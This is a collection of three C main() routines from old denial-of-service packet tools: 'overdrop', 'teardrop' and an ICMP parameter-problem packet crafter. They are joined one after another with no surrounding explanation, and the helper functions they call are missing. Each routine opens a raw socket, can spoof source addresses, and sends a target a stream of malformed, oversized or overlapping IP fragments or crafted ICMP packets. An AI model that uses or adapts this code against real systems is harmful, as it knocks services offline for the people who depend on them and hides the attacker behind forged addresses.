int main(int argc, char **argv) {
int one=1,count=0,i,rip_sock;
u_long src_ip=0,dst_ip=0;
u_short src_prt=0,dst_prt=0;
struct in_addr addr;
fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n");
if((rip_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) {
perror("IP_HDRINCL");
exit(1);
}
if (argc < 2) usage(argv[0]);
if (!(dst_ip=name_resolve(argv[1]))) {
fprintf(stderr,"Can't resolve destination address.\n");
exit(1);
}
while ((i=getopt(argc,argv,"s:n:"))!=EOF) {
switch (i) {
case 'n':
count = atoi(optarg);
break;
case 's':
if (!(src_ip=name_resolve(optarg))) {
fprintf(stderr,"Can't resolve source address.\n");
exit(1);
}
break;
default:
usage(argv[0]);
break;
}
}
srandom((unsigned)(time((time_t)0)));
if (!count) count=COUNT;
fprintf(stderr,"Sending oversized packets:\nFrom: ");
if (!src_ip) fprintf(stderr," (random)"); else {
addr.s_addr = src_ip;
fprintf(stderr,"%15s",inet_ntoa(addr));
}
addr.s_addr = dst_ip;
fprintf(stderr,"\n To: %15s\n",inet_ntoa(addr));
fprintf(stderr," Amt: %5d\n",count);
fprintf(stderr,"[ ");
for (i=0;i<count;i++) {
if (!src_ip) send_frags(rip_sock,rand(),dst_ip,rand(),rand()); else
send_frags(rip_sock,src_ip,dst_ip,rand(),rand());
fprintf(stderr, "b00z ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}
int main(int argc, char **argv)
{
int one = 1,
count = 0,
i,
rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;
fprintf(stderr, "teardrop route|daemon9\n\n");
//建SOCK_RAW
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
//由系统处理IP校验和。
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, "Death on flaxen wings:\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}
int main(int argc, char **argv)
{
u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip = 0;
u_long *problem = NULL;
u_char *packet = NULL;
int sock, c, len = 0;
long acx, count = 1;
struct icmp *icmp;
struct ip *ip;
/* It appears that most IP options of length >0 will work
* Works with 128, 64, 32, 16... And the normal ones 137...
* Does not work with 0, 1 */
u_char data[] = {137};
int data_len = sizeof(data);
printf("Written by Mike Frantzen... <*****@*****.**>\n");
printf("For test purposes only... yada yada yada...\n");
src_ip = inet_addr("10.10.10.10");
while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) {
switch(c) {
case 'd': dst_ip = libnet_name_resolve(optarg, 1);
break;
case 's': src_ip = libnet_name_resolve(optarg, 1);
break;
case 'D': ins_dst_ip = name_resolve(optarg, 1);
break;
case 'S': ins_src_ip = name_resolve(optarg, 1);
break;
case 'l': data_len = atoi(optarg);
break;
case 'c': if ( (count = atol(optarg)) < 1)
count = 1;
break;
default: printf("Don't understand option.\n");
exit(-1);
}
}
if ( dst_ip == 0 ) {
printf("Usage: %s\t -d <destination IP>\t[-s <source IP>]\n",
rindex(argv[0], '/') == NULL ? argv[0]
: rindex(argv[0], '/') + 1);
printf("\t\t[-S <inner source IP>]\t[-D <inner dest IP>]\n");
printf("\t\t[-l <data length>]\t[-c <# to send>]\n");
exit(-1);
}
if ( ins_dst_ip == 0 )
ins_dst_ip = src_ip;
if ( ins_src_ip == 0 )
ins_src_ip = dst_ip;
if ( (packet = malloc(1500)) == NULL ) {
perror("malloc: ");
exit(-1);
}
if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) {
perror("socket: ");
exit(-1);
}
/* 8 is the length of the ICMP header with the problem field */
len = 8 + IP_H + data_len;
bzero(packet + IP_H, len);
libnet_build_ip(len, /* Size of the payload */
0xc2, /* IP tos */
30241, /* IP ID */
0, /* Frag Offset & Flags */
64, /* TTL */
IPPROTO_ICMP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload */
0,
packet); /* Packet memory */
/* ICMP Header for Parameter Problem
* --------------+---------------+---------------+---------------
*| Type (12) | Code (0) | Checksum |
* --------------+---------------+---------------+---------------
*| Pointer | unused |
* --------------+---------------+---------------+---------------
* Internet Header + 64 bits of original datagram data....
*/
icmp = (struct icmp *) (packet + IP_H);
problem = (u_long *) (packet + IP_H + 4); /* 4 = ICMP header */
icmp->icmp_type = ICMP_PARAMPROB;
icmp->icmp_code = 0; /* Indicates a problem pointer */
*problem = htonl(0x14000000); /* Problem is 20 bytes into it */
/* Need to embed an IP packet within the ICMP */
ip = (struct ip *) (packet + IP_H + 8); /* 8 = icmp header */
ip->ip_v = 0x4; /* IPV4 */
ip->ip_hl = 0xf; /* Some IP Options */
ip->ip_tos = 0xa3; /* Whatever */
ip->ip_len = htons(data_len); /* Length of packet */
ip->ip_id = 30241; /* Whatever */
ip->ip_off = 0; /* No frag's */
ip->ip_ttl = 32; /* Whatever */
ip->ip_p = 98; /* Random protocol */
ip->ip_sum = 0; /* Will calc later */
ip->ip_src.s_addr = ins_src_ip;
ip->ip_dst.s_addr = ins_dst_ip;
/* Move our data block into the packet */
bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len);
/* I hate checksuming. Spent a day trying to get it to work in
* perl... That sucked... Tequilla would have helped immensly.
*/
libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_len);
/* Bah... See above comment.... */
libnet_do_checksum(packet, IPPROTO_ICMP, len);
printf("Sending %li packets", count);
for (acx = 0; acx < count; acx++) {
if( libnet_write_ip(sock, packet, len + IP_H) < (len + IP_H))
perror("write_ip: ");
else printf(".");
}
printf("\n\n");
return( 0 );
}
